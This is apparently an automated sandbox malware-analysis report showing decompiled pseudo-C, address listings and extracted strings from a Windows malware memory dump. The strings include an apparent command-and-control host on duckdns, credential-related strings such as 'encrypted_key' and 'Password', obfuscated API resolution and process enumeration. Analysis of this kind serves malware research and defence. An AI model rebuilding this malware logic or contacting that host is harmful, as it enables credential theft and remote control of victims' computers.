								_v1304 = 0x100;
								_v1312 = 0xffffffff;
								_v1308 = _t318;
								_v1320 = 0;
								_v1324 = 0;
								_v1316 =  *((intOrPtr*)(_t311 + 0x18)) + 0x20;
								L0041F4DC();
								_v1332 = 0;
								_v1336 = 0;
								_v1340 = 0;
								_v1268 = 0;
								_v1328 =  &_v1268;
								_v1344 =  *((intOrPtr*)(_t311 + 0x18));
								_v1352 = _t311;
								_v1348 =  *((intOrPtr*)(_t311 + 0x14));
								_v1356 = _v1280;
								_t250 = _v1296();
								_t324 = _t326 - 0xffffffffffffffe0;
								if(_t250 == 0) {
									_t301 =  &_v492;
									_v1360 = 0;
									_v1364 = 0;
									_v1368 = 0x100;
									_v1372 = _t301;
									_v1376 = 0xffffffff;
									_v1384 = 0;
									 *_t324 = 0;
									_v1332 = _t301;
									_v1380 = _v1300[0x1c] + 0x20;
									L0041F4DC();
									_t324 = _t324 - 0x20;
									_t299 = _v1364;
									_v1404 = _t318;
									_t318 =  &_v1328;
									_v1412 = 2;
									_v1416 = 0x4239a1;
									_v1408 =  &_v1036;
									_v1328 = 0;
									_v1400 = _t299;
									 *_t324 = _t318;
									_t257 = E00412755( &_v1036);
									_t312 = _t257;
									if(_t257 != 0xffffffff) {
										_v1408 = _t257;
										_v1416 = _t290;
										_v1404 = 1;
										_v1412 = _t318;
										_t290 = _t290 + _t312;
										 *_t324 =  &_v1348;
										_v1348 = E00412ABF(0);
									}
								}
								_t251 = _v1300;
								if(_t251 != 0) {
									 *_t324 = _t251;
									_v1344();
									_push(_t318);
								}
							}
							_v1340 =  &(1[_v1340]);
						}
						goto L33;
					}
				}
			}





















































































































                                                          0x0040dce9
                                                          0x0040dd08
                                                          0x0040dd20
                                                          0x0040dd26
                                                          0x0040dd2e
                                                          0x0040dd36
                                                          0x0040dd3e
                                                          0x0040dd46
                                                          0x0040dd46
                                                          0x0040dd4f
                                                          0x0040dd54
                                                          0x0040dd57
                                                          0x0040dd5c
                                                          0x0040dd5e
                                                          0x0040dd60
                                                          0x0040dd63
                                                          0x0040e3aa
                                                          0x0040e3b4
                                                          0x0040e3b4
                                                          0x0040dd69
                                                          0x0040dd70
                                                          0x0040dd75
                                                          0x0040dd78
                                                          0x0040dd7c
                                                          0x0040dd81
                                                          0x0040dd83
                                                          0x0040dd85
                                                          0x0040dd8c
                                                          0x0040dd91
                                                          0x0040dd94
                                                          0x0040dd98
                                                          0x0040dd9d
                                                          0x0040dd9f
                                                          0x0040dda6
                                                          0x0040ddaa
                                                          0x0040ddaf
                                                          0x0040ddb2
                                                          0x0040ddb6
                                                          0x0040ddbb
                                                          0x0040ddbd
                                                          0x0040ddbf
                                                          0x0040ddc6
                                                          0x0040ddcb
                                                          0x0040ddce
                                                          0x0040ddd2
                                                          0x0040ddd7
                                                          0x0040ddd9
                                                          0x0040dde0
                                                          0x0040dde4
                                                          0x0040dde9
                                                          0x0040ddec
                                                          0x0040ddf0
                                                          0x0040ddf5
                                                          0x0040ddf7
                                                          0x0040ddfe
                                                          0x0040de02
                                                          0x0040de07
                                                          0x0040de0a
                                                          0x0040de0e
                                                          0x0040de15
                                                          0x0040de16
                                                          0x0040de17
                                                          0x0040de1c
                                                          0x0040de2a
                                                          0x0040de34
                                                          0x0040de3e
                                                          0x0040de43
                                                          0x0040de4c
                                                          0x0040de4c
                                                          0x00000000
                                                          0x0040de53
                                                          0x0040de57
                                                          0x0040de5f
                                                          0x0040de67
                                                          0x0040de6a
                                                          0x0040de6c
                                                          0x0040de71
                                                          0x00000000
                                                          0x00000000
                                                          0x0040de77
                                                          0x0040de7f
                                                          0x0040de87
                                                          0x0040de8f
                                                          0x0040de92
                                                          0x0040de94
                                                          0x0040de99
                                                          0x00000000
                                                          0x0040dea2
                                                          0x0040deaa
                                                          0x0040dec0
                                                          0x00000000
                                                          0x0040deea
                                                          0x0040deea
                                                          0x0040def2
                                                          0x0040e164
                                                          0x0040e142
                                                          0x0040e14a
                                                          0x0040e14e
                                                          0x0040e152
                                                          0x0040e155
                                                          0x0040e15e
                                                          0x0040e17a
                                                          0x0040e182
                                                          0x0040e18a
                                                          0x0040e192
                                                          0x0040e19a
                                                          0x0040e1a1
                                                          0x0040e1a9
                                                          0x0040e1b0
                                                          0x0040e1b4
                                                          0x0040e1b9
                                                          0x0040e1c3
                                                          0x0040e1cb
                                                          0x0040e1d3
                                                          0x0040e1db
                                                          0x0040e1e3
                                                          0x0040e1ea
                                                          0x0040e1f2
                                                          0x0040e1fc
                                                          0x0040e200
                                                          0x0040e208
                                                          0x0040e20f
                                                          0x0040e217
                                                          0x0040e21f
                                                          0x0040e227
                                                          0x0040e22f
                                                          0x0040e236
                                                          0x0040e23e
                                                          0x0040e248
                                                          0x0040e24c
                                                          0x0040e258
                                                          0x0040e260
                                                          0x0040e268
                                                          0x0040e270
                                                          0x0040e277
                                                          0x0040e27e
                                                          0x0040e282
                                                          0x0040e28a
                                                          0x0040e28d
                                                          0x0040e291
                                                          0x0040e296
                                                          0x0040e2a0
                                                          0x0040e2a7
                                                          0x0040e2af
                                                          0x0040e2b7
                                                          0x0040e2bf
                                                          0x0040e2c3
                                                          0x0040e2ce
                                                          0x0040e2d6
                                                          0x0040e2dd
                                                          0x0040e2e4
                                                          0x0040e2e8
                                                          0x0040e2ed
                                                          0x0040e2f0
                                                          0x0040e2f4
                                                          0x0040e2ff
                                                          0x0040e303
                                                          0x0040e30b
                                                          0x0040e313
                                                          0x0040e317
                                                          0x0040e31f
                                                          0x0040e323
                                                          0x0040e326
                                                          0x0040e32e
                                                          0x0040e330
                                                          0x0040e332
                                                          0x0040e33a
                                                          0x0040e33e
                                                          0x0040e346
                                                          0x0040e34a
                                                          0x0040e34c
                                                          0x0040e354
                                                          0x0040e354
                                                          0x0040e330
                                                          0x0040e358
                                                          0x0040e35e
                                                          0x0040e364
                                                          0x0040e367
                                                          0x0040e36b
                                                          0x0040e36b
                                                          0x0040e35e
                                                          0x0040e160
                                                          0x0040e160
                                                          0x0040e371
                                                          0x0040e371
                                                          0x0040e377
                                                          0x0040e379
                                                          0x0040e37c
                                                          0x0040e380
                                                          0x0040e380
                                                          0x0040e386
                                                          0x0040e38c
                                                          0x0040e38f
                                                          0x0040e393
                                                          0x0040e393
                                                          0x0040e394
                                                          0x0040e397
                                                          0x0040e39c
                                                          0x0040e3a4
                                                          0x0040e3a6
                                                          0x00000000
                                                          0x0040e3a6
                                                          0x0040dec0
                                                          0x0040deac
                                                          0x0040deac
                                                          0x0040deb4
                                                          0x0040df24
                                                          0x0040df02
                                                          0x0040df0a
                                                          0x0040df0e
                                                          0x0040df12
                                                          0x0040df15
                                                          0x0040df1e
                                                          0x0040df3a
                                                          0x0040df42
                                                          0x0040df4a
                                                          0x0040df52
                                                          0x0040df5a
                                                          0x0040df61
                                                          0x0040df69
                                                          0x0040df70
                                                          0x0040df74
                                                          0x0040df79
                                                          0x0040df83
                                                          0x0040df8b
                                                          0x0040df93
                                                          0x0040df9b
                                                          0x0040dfa3
                                                          0x0040dfaa
                                                          0x0040dfb2
                                                          0x0040dfbc
                                                          0x0040dfc0
                                                          0x0040dfc8
                                                          0x0040dfcf
                                                          0x0040dfd7
                                                          0x0040dfdf
                                                          0x0040dfe7
                                                          0x0040dfef
                                                          0x0040dff6
                                                          0x0040dffe
                                                          0x0040e008
                                                          0x0040e00c
                                                          0x0040e018
                                                          0x0040e020
                                                          0x0040e028
                                                          0x0040e030
                                                          0x0040e038
                                                          0x0040e03f
                                                          0x0040e046
                                                          0x0040e04a
                                                          0x0040e052
                                                          0x0040e055
                                                          0x0040e059
                                                          0x0040e05e
                                                          0x0040e068
                                                          0x0040e06f
                                                          0x0040e077
                                                          0x0040e07f
                                                          0x0040e087
                                                          0x0040e08b
                                                          0x0040e096
                                                          0x0040e09e
                                                          0x0040e0a5
                                                          0x0040e0ac
                                                          0x0040e0b0
                                                          0x0040e0b5
                                                          0x0040e0b8
                                                          0x0040e0bc
                                                          0x0040e0c7
                                                          0x0040e0cb
                                                          0x0040e0d3
                                                          0x0040e0db
                                                          0x0040e0df
                                                          0x0040e0e7
                                                          0x0040e0eb
                                                          0x0040e0ee
                                                          0x0040e0f6
                                                          0x0040e0f8
                                                          0x0040e0fa
                                                          0x0040e102
                                                          0x0040e106
                                                          0x0040e10e
                                                          0x0040e112
                                                          0x0040e114
                                                          0x0040e11c
                                                          0x0040e11c
                                                          0x0040e0f8
                                                          0x0040e120
                                                          0x0040e126
                                                          0x0040e12c
                                                          0x0040e12f
                                                          0x0040e133
                                                          0x0040e133
                                                          0x0040e126
                                                          0x0040df20
                                                          0x0040df20
                                                          0x00000000
                                                          0x0040df24
                                                          0x0040de99

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2CQi5Yi4.Sii$zCQi5Ed5X5dl$zCQi5PiW6dzCQi5$zCQi5TsdRzCQi5$zCQi5_0dd$zCQi5jRQld0C5dX5dl6
                                                          • API String ID: 0-1136301387
                                                          • Opcode ID: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                                                          • Instruction ID: 0411f2c87eaa10a6bc819440aee1928311a11f64f3fd3897648e7812cf6e01f9
                                                          • Opcode Fuzzy Hash: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
                                                          • Instruction Fuzzy Hash: 6802ADB04087419FD310EF6AC58875BBBE4BF84358F108D2EF4948B291E7B9D5898F96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040FE8C, Relevance: 7.7, Strings: 6, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 49%
                                                          			E0040FE8C(signed int __eax, void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v56;
				char _v560;
				char _v1108;
				void* _v1364;
				char _v1368;
				signed int _v1396;
				char _v1404;
				char _v1432;
				char _v1436;
				char _v1444;
				signed short _v1448;
				signed short _v1450;
				signed short _v1452;
				signed short _v1454;
				signed short _v1458;
				signed short _v1460;
				char _v1464;
				char* _v1468;
				char _v1476;
				intOrPtr _v1480;
				char* _v1488;
				char* _v1496;
				char _v1500;
				intOrPtr _v1504;
				void* _v1508;
				signed int _v1512;
				signed int _v1516;
				signed int _v1520;
				signed int _v1524;
				signed int _v1528;
				signed int _v1532;
				signed int _v1536;
				signed int _v1540;
				signed int _v1544;
				char* _v1548;
				intOrPtr _v1552;
				char _v1556;
				char* _t79;
				void* _t82;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t87;
				void* _t93;
				signed int _t94;
				signed int _t102;
				void* _t111;
				void* _t112;
				char* _t116;
				void* _t117;
				char* _t119;
				intOrPtr* _t121;
				char* _t123;
				char* _t124;
				signed int _t127;
				intOrPtr* _t128;
				void* _t129;

				_t118 = __edx;
				_t117 = __ecx;
				_v1496 = 0;
				_v1500 = 2;
				L0041F664();
				_push(__edx);
				_push(__edx);
				if(__eax == 0xffffffff) {
					L3:
					_v1496 = 0;
					return E00405D7D(_t118, _v4, 0xbf, 0);
				}
				_t115 = __eax;
				_t79 =  &_v1364;
				_v1364 = 0x128;
				_v1508 = __eax;
				_v1504 = _t79;
				L0041F52C();
				_push(_t126);
				if(_t79 != 0) {
					E0041236C( &_v1432,  &_v1432, 0x8000);
					_t82 = E004081AA("Ed5FWSQid_4idLCldjfD");
					_t84 = E00407F8E(_t118, E00407F7A(_t118, "psapi.dll"), _t82);
					_t121 = _t84;
					if(_t84 == 0) {
						_t112 = E004081AA("Ed5FWSQid_4idLCldjfD");
						_t121 = E00407F8E(_t118, E00407F7A(_t118, "kernel32.dll"), _t112);
					}
					_t127 =  &_v560;
					do {
						_t85 = _v1364;
						_v1512 = 0;
						_v1516 = 0x410;
						_v1508 = _t85;
						L0041F53C();
						_t129 = _t128 - 0xc;
						_t123 = _t85;
						if(_t85 == 0 || _t121 == 0) {
							L10:
							E00412548(_t127, 0x424374, 0x204);
							goto L11;
						} else {
							_v1516 = 0x204;
							_v1520 = _t127;
							_v1524 = 0;
							_v1528 = _t85;
							_t111 =  *_t121();
							_t129 = _t129 - 0x10;
							if(_t111 != 0) {
								L11:
								_t87 =  &_v1452;
								_t119 =  &_v1460;
								_v1528 = _t123;
								_v1512 = _t87;
								_v1516 = _t87;
								_v1520 = _t87;
								_v1524 = _t119;
								_v1468 = _t119;
								L0041F5A4();
								_t128 = _t129 - 0x14;
								if(_t87 == 0) {
									L23:
									E00412548( &_v1436, 0x424374, 0x20);
									goto L14;
								}
								_t119 = _v1488;
								if(_v1480 == 0) {
									goto L23;
								}
								_t102 =  &_v1452;
								_v1548 = _t119;
								_v1544 = _t102;
								L0041F644();
								_push(_t102);
								_push(_t102);
								_v1548 = "%.2d/%.2d/%d %.2d:%.2d:%.2d";
								_v1552 = 0x20;
								_v1524 = _v1448 & 0x0000ffff;
								_v1528 = _v1450 & 0x0000ffff;
								_v1532 = _v1452 & 0x0000ffff;
								_v1536 = _v1460 & 0x0000ffff;
								_v1540 = _v1458 & 0x0000ffff;
								_v1544 = _v1454 & 0x0000ffff;
								_v1556 =  &_v1444;
								E004127A8();
								goto L14;
							}
							goto L10;
						}
						L14:
						if(_t123 != 0) {
							_v1548 = _t123;
							L0041F694();
							_push(_t123);
						}
						_t124 =  &_v1108;
						_v1528 = _t127;
						_v1540 = 0x424376;
						_v1544 = 0x204;
						_v1524 =  &_v1436;
						_v1548 = _t124;
						_v1532 = _v1396;
						_v1536 =  &_v1368;
						_t93 = E004127A8();
						if(_t93 > 0) {
							E00412458( &_v1464, _t119,  &_v1464, _t124, _t93);
						}
						_t94 =  &_v1404;
						_v1548 = _t115;
						_v1544 = _t94;
						L0041F524();
						_push(_t117);
						_push(_t117);
					} while (_t94 != 0);
					_v1556 = _t115;
					L0041F694();
					_push(_t119);
					_t116 =  &_v1476;
					if(_v1468 == 0) {
						_v1548 = 0;
						_v1552 = 0;
						_v1556 = 0xbf;
					} else {
						 *_t128 = _t116;
						_v1548 = E00412540();
						_v1556 = 0xbe;
						_v1552 = _v1476;
					}
					 *_t128 = _v56;
					E00405D7D(_t119);
					 *_t128 = _t116;
					return E004123B1();
				}
				_v1516 = __eax;
				L0041F694();
				goto L3;
			}




























































                                                          0x0040fe8c
                                                          0x0040fe8c
                                                          0x0040fe96
                                                          0x0040fe9e
                                                          0x0040fea5
                                                          0x0040fead
                                                          0x0040feae
                                                          0x0040feaf
                                                          0x0040fee0
                                                          0x0040fee7
                                                          0x00000000
                                                          0x0040ff02
                                                          0x0040feb1
                                                          0x0040feb3
                                                          0x0040feba
                                                          0x0040fec5
                                                          0x0040fec8
                                                          0x0040fecc
                                                          0x0040fed4
                                                          0x0040fed5
                                                          0x0040ff1b
                                                          0x0040ff27
                                                          0x0040ff41
                                                          0x0040ff48
                                                          0x0040ff4a
                                                          0x0040ff53
                                                          0x0040ff72
                                                          0x0040ff72
                                                          0x0040ff74
                                                          0x0040ff7b
                                                          0x0040ff7b
                                                          0x0040ff82
                                                          0x0040ff8a
                                                          0x0040ff91
                                                          0x0040ff95
                                                          0x0040ff9a
                                                          0x0040ff9f
                                                          0x0040ffa1
                                                          0x0040ffc7
                                                          0x0040ffda
                                                          0x00000000
                                                          0x0040ffa7
                                                          0x0040ffa7
                                                          0x0040ffaf
                                                          0x0040ffb3
                                                          0x0040ffbb
                                                          0x0040ffbe
                                                          0x0040ffc0
                                                          0x0040ffc5
                                                          0x0040ffdf
                                                          0x0040ffdf
                                                          0x0040ffe3
                                                          0x0040ffe7
                                                          0x0040ffea
                                                          0x0040ffee
                                                          0x0040fff2
                                                          0x0040fff6
                                                          0x0040fffa
                                                          0x0040fffe
                                                          0x00410003
                                                          0x00410008
                                                          0x00410167
                                                          0x0041017e
                                                          0x00000000
                                                          0x0041017e
                                                          0x00410013
                                                          0x00410017
                                                          0x00000000
                                                          0x00000000
                                                          0x0041001d
                                                          0x00410021
                                                          0x00410024
                                                          0x00410028
                                                          0x0041002d
                                                          0x0041002e
                                                          0x00410034
                                                          0x0041003c
                                                          0x00410044
                                                          0x0041004d
                                                          0x00410056
                                                          0x0041005f
                                                          0x00410068
                                                          0x00410071
                                                          0x00410079
                                                          0x0041007c
                                                          0x00000000
                                                          0x0041007c
                                                          0x00000000
                                                          0x0040ffc5
                                                          0x00410081
                                                          0x00410083
                                                          0x00410085
                                                          0x00410088
                                                          0x0041008d
                                                          0x0041008d
                                                          0x00410092
                                                          0x00410099
                                                          0x0041009d
                                                          0x004100a5
                                                          0x004100ad
                                                          0x004100b8
                                                          0x004100bb
                                                          0x004100c6
                                                          0x004100ca
                                                          0x004100d1
                                                          0x004100e2
                                                          0x004100e2
                                                          0x004100e7
                                                          0x004100ee
                                                          0x004100f1
                                                          0x004100f5
                                                          0x004100fc
                                                          0x004100fd
                                                          0x004100fd
                                                          0x00410104
                                                          0x00410107
                                                          0x0041010c
                                                          0x00410112
                                                          0x00410116
                                                          0x00410136
                                                          0x0041013e
                                                          0x00410146
                                                          0x00410118
                                                          0x00410118
                                                          0x00410120
                                                          0x00410128
                                                          0x00410130
                                                          0x00410130
                                                          0x00410155
                                                          0x00410158
                                                          0x0041015d
                                                          0x00000000
                                                          0x00410160
                                                          0x0040fed7
                                                          0x0040feda
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $%.2d/%.2d/%d %.2d:%.2d:%.2d$Ed5FWSQid_4idLCldjfD$kernel32.dll$psapi.dll
                                                          • API String ID: 0-116260847
                                                          • Opcode ID: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                                                          • Instruction ID: 6fadafcb3b73e839ba5121377a1d1d4624def229cb7cc3727062cbee2f3d546e
                                                          • Opcode Fuzzy Hash: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
                                                          • Instruction Fuzzy Hash: BB81C3B0408741AED720AF25C54566FBBE4AF85748F018D2EF8D887351E7BDC989CB46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408FE0, Relevance: 7.7, Strings: 6, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "%s"$-m "%s"$M5QV9C5I$MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56\%6$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$rb+
                                                          • API String ID: 0-3789651114
                                                          • Opcode ID: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                                                          • Instruction ID: cf1332e757baf714fb04fabdc2a14f291af18396ddc48b811abeeedaa7cc8274
                                                          • Opcode Fuzzy Hash: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
                                                          • Instruction Fuzzy Hash: 4D61C7B04087119AD710BF61D64536EBBE1AF81348F41C86EE4C86B383CBBD8985DB5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00413748, Relevance: 7.6, Strings: 6, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $PATH$Password$Unknown$WINDIR$podzeye.duckdns.org:6688;
                                                          • API String ID: 0-1553153373
                                                          • Opcode ID: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
                                                          • Instruction ID: 88353113fceb9506f3b36d61bfde8eef9921c9a466ae1bfd82caa565229af05a
                                                          • Opcode Fuzzy Hash: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
                                                          • Instruction Fuzzy Hash: A2619CB49087849BD720EF65C18469EFBE0BF89348F408D2EE8D887351E7789548CF5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409E61, Relevance: 7.6, Strings: 6, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E00409E61(void* __edx) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v60;
				void _v108;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				void* _t29;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				char* _t36;
				void* _t39;
				char _t45;
				void* _t46;
				intOrPtr* _t48;

				_t39 = __edx;
				memcpy( &_v108, L"ssdaClass", 5 << 2);
				_t48 = _t46 - 0x90 + 0xc;
				_t29 = E004081AA("rdn465d0rCgXRsQ5ad24Yd6");
				_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t29);
				 *0x42b9e4 = _t31;
				if(_t31 != 0) {
					_t32 = E004081AA("Ed5rCgXRsQ5aC5C");
					_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t32);
					 *0x42b9e0 = _t31;
					if(_t31 == 0) {
						goto L1;
					} else {
						_t45 =  &_v60;
						_t35 =  &_v108;
						_t31 = E004129E4(_t45, 0, 0x30);
						_v156 = _t45;
						_v60 = 0x30;
						_v52 = E00409CF9;
						_v40 = 0;
						_v20 = _t35;
						L0041F854();
						_push(0);
						if(_t31 != 0) {
							_v156 = _t35;
							_v116 = 0;
							_v120 = 0;
							_v124 = 0;
							_v128 = 0xfffffffd;
							_v132 = 0;
							_v136 = 0;
							_v140 = 0;
							_v144 = 0;
							_v148 = 0;
							_v152 = 0;
							 *_t48 = 0;
							L0041F8DC();
							_t48 = _t48 - 0x30;
							_t36 =  &_v140;
							if(_t31 == 0) {
								goto L4;
							} else {
								while(1) {
									_v196 = 0;
									_v200 = 0;
									_v204 = 0;
									 *_t48 = _t36;
									L0041F884();
									_t48 = _t48 - 0x10;
									if(_t31 <= 0) {
										break;
									}
									 *_t48 = _t36;
									L0041F814();
									_push(_t31);
									 *_t48 = _t36;
									L0041F8CC();
									_push(_t39);
								}
								 *0x422830 = 0xa;
							}
						} else {
							L4:
							 *0x422830 = 7;
						}
					}
				} else {
					L1:
					 *0x422830 = 6;
				}
				return _t31;
			}































                                                          0x00409e61
                                                          0x00409e78
                                                          0x00409e78
                                                          0x00409e81
                                                          0x00409e9b
                                                          0x00409ea2
                                                          0x00409ea7
                                                          0x00409ebf
                                                          0x00409ed9
                                                          0x00409ee0
                                                          0x00409ee5
                                                          0x00000000
                                                          0x00409ee7
                                                          0x00409ee7
                                                          0x00409eeb
                                                          0x00409f02
                                                          0x00409f07
                                                          0x00409f0a
                                                          0x00409f12
                                                          0x00409f1a
                                                          0x00409f22
                                                          0x00409f29
                                                          0x00409f31
                                                          0x00409f32
                                                          0x00409f43
                                                          0x00409f47
                                                          0x00409f4f
                                                          0x00409f57
                                                          0x00409f5f
                                                          0x00409f67
                                                          0x00409f6f
                                                          0x00409f77
                                                          0x00409f7f
                                                          0x00409f87
                                                          0x00409f8f
                                                          0x00409f97
                                                          0x00409f9e
                                                          0x00409fa3
                                                          0x00409fa8
                                                          0x00409fac
                                                          0x00000000
                                                          0x00409fae
                                                          0x00409fae
                                                          0x00409fae
                                                          0x00409fb6
                                                          0x00409fbe
                                                          0x00409fc6
                                                          0x00409fc9
                                                          0x00409fce
                                                          0x00409fd3
                                                          0x00000000
                                                          0x00000000
                                                          0x00409fd5
                                                          0x00409fd8
                                                          0x00409fdd
                                                          0x00409fde
                                                          0x00409fe1
                                                          0x00409fe6
                                                          0x00409fe6
                                                          0x00409fe9
                                                          0x00409fe9
                                                          0x00409f34
                                                          0x00409f34
                                                          0x00409f34
                                                          0x00409f34
                                                          0x00409f32
                                                          0x00409ea9
                                                          0x00409ea9
                                                          0x00409ea9
                                                          0x00409ea9
                                                          0x00409ffc

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$0$Ed5rCgXRsQ5aC5C$rdn465d0rCgXRsQ5ad24Yd6$ssdaClass$user32.dll
                                                          • API String ID: 0-2341246112
                                                          • Opcode ID: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                                                          • Instruction ID: dc59c3b724a470855dcc4065ae2b59d1d9b3c777af613543eb6a0d926dcb9681
                                                          • Opcode Fuzzy Hash: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
                                                          • Instruction Fuzzy Hash: 863108B05183019AE310BF25D55531FBAE0BF84348F41892EF4C4AB292D7BD8949CB9B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040B1F4, Relevance: 7.6, Strings: 6, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$MT_qUDrj\FWk4iiC\%6\$MT_qUDrj\FWk4iiC\%6\%6\FC4R$PQ00dR5zd064WR$XR65Cii a40dY5W0Z$x64
                                                          • API String ID: 0-4110341741
                                                          • Opcode ID: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                                                          • Instruction ID: 72ec6481281fc5666a7dbf46cbeff2a2701b551c42623141a7dd164dfcf0ae83
                                                          • Opcode Fuzzy Hash: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
                                                          • Instruction Fuzzy Hash: E221E0B0508301AED300AF26D54925EFBF4EF88308F418D2EE8D897241D7BD9685CB8A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040EDD6, Relevance: 6.5, Strings: 5, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$0x%02hhX$0x05$0x0D$encrypted_key
                                                          • API String ID: 0-939079894
                                                          • Opcode ID: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                                                          • Instruction ID: 786053efb03fb7134250340436023ef553204ed8f41ee6c066ba5e47f52fe47d
                                                          • Opcode Fuzzy Hash: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
                                                          • Instruction Fuzzy Hash: FEC1EAB1A053198FDB50DF25C844B9EBBF0BF45308F0588AEE489E7681D7789A84CF46
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00411D8C, Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $($($6$BM
                                                          • API String ID: 0-2637400849
                                                          • Opcode ID: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                                                          • Instruction ID: c42d9fa6f562a18c3eedbb1c72d559f421865ac330c7369b2ec7bacda9b62638
                                                          • Opcode Fuzzy Hash: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
                                                          • Instruction Fuzzy Hash: 4781BDB05093409FD310EF6AD68475BBBE4AF88744F40892EF58887351E7B9D8888B5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00421320, Relevance: 6.4, Strings: 5, Instructions: 164COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
